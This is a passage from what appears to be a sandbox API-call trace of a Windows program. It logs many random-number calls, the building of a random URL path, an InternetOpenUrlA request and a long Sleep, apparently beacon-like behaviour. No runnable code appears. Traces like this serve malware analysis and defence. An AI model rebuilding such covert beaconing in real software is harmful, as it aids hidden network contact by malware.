lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.631] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.632] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.632] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.632] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.632] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0193.632] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.632] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.632] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.633] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.633] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.633] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.633] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.633] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.633] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.633] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.634] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.634] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.634] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.634] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.634] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.634] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0193.634] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.634] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.635] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.635] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.635] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.635] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.635] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.635] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.636] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.636] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.636] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.636] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.636] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.636] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0193.636] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.637] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a016d2, cbBuffer=0x1c, dwFlags=0x2 | out: pbBuffer=0x3a016d2) returned 0x0 [0193.637] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.637] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.637] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.637] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.638] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.638] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.638] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.638] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.638] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.638] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.639] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.639] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.639] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.639] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.639] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.639] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.639] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.639] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.640] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.640] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.640] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.640] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.641] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.641] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.641] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.641] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.641] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.641] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.641] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.641] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.642] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.642] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.642] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.642] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.642] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.642] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.642] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.642] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.642] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.643] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.643] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.643] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0193.644] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.644] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a016ee, cbBuffer=0x15, dwFlags=0x2 | out: pbBuffer=0x3a016ee) returned 0x0 [0193.644] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.644] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.644] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.644] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.644] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.645] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.645] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.645] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.645] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.645] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.645] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.646] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.646] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.646] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.647] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.647] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.647] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.647] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.647] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.648] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.648] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.648] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.648] GetProcessHeap () returned 0x440000 [0193.648] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472b10 [0193.648] lstrcpyA (in: lpString1=0x472b10, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0193.648] lstrcatA (in: lpString1="\x81\x03", lpString2="/j8NO48g79lr5Glnqdchac7F0twxx7keb23fvoc4wIh489n/X3ycbiw7Omgqg3vakej5ceiazXRskYjhUkwf/V7v2ZysyccGweqtnejyDpewp6Kknle2xq3dxU3gSx1ch/d0km48jgjy0ftwd4phahkg996v3/dplJ5qy0bLYlnfe4lhqg/" | out: lpString1="\x81\x03/j8NO48g79lr5Glnqdchac7F0twxx7keb23fvoc4wIh489n/X3ycbiw7Omgqg3vakej5ceiazXRskYjhUkwf/V7v2ZysyccGweqtnejyDpewp6Kknle2xq3dxU3gSx1ch/d0km48jgjy0ftwd4phahkg996v3/dplJ5qy0bLYlnfe4lhqg/") returned="\x81\x03/j8NO48g79lr5Glnqdchac7F0twxx7keb23fvoc4wIh489n/X3ycbiw7Omgqg3vakej5ceiazXRskYjhUkwf/V7v2ZysyccGweqtnejyDpewp6Kknle2xq3dxU3gSx1ch/d0km48jgjy0ftwd4phahkg996v3/dplJ5qy0bLYlnfe4lhqg/" [0193.648] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0193.648] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/j8NO48g79lr5Glnqdchac7F0twxx7keb23fvoc4wIh489n/X3ycbiw7Omgqg3vakej5ceiazXRskYjhUkwf/V7v2ZysyccGweqtnejyDpewp6Kknle2xq3dxU3gSx1ch/d0km48jgjy0ftwd4phahkg996v3/dplJ5qy0bLYlnfe4lhqg/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0193.648] GetProcessHeap () returned 0x440000 [0193.648] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472b10 | out: hHeap=0x440000) returned 1 [0193.649] GetProcessHeap () returned 0x440000 [0193.649] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a01650 | out: hHeap=0x440000) returned 1 [0193.649] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0193.649] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0193.649] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.649] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0193.650] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0193.650] Sleep (dwMilliseconds=0x185f4) [0193.926] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.926] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0193.926] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.926] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0193.926] GetProcessHeap () returned 0x440000 [0193.926] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a16800 [0193.927] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0193.927] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16801, cbBuffer=0x14, dwFlags=0x2 | out: pbBuffer=0x3a16801) returned 0x0 [0193.927] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.927] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.928] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.928] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.928] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.929] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.929] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.929] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.930] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.930] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.930] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.931] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.931] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.931] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0193.932] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16815, cbBuffer=0x13, dwFlags=0x2 | out: pbBuffer=0x3a16815) returned 0x0 [0193.932] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.932] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.932] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.933] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.933] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.934] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.934] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.934] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.934] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.935] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.935] BCryptGenRandom (in: hAlgorithm=0x0, 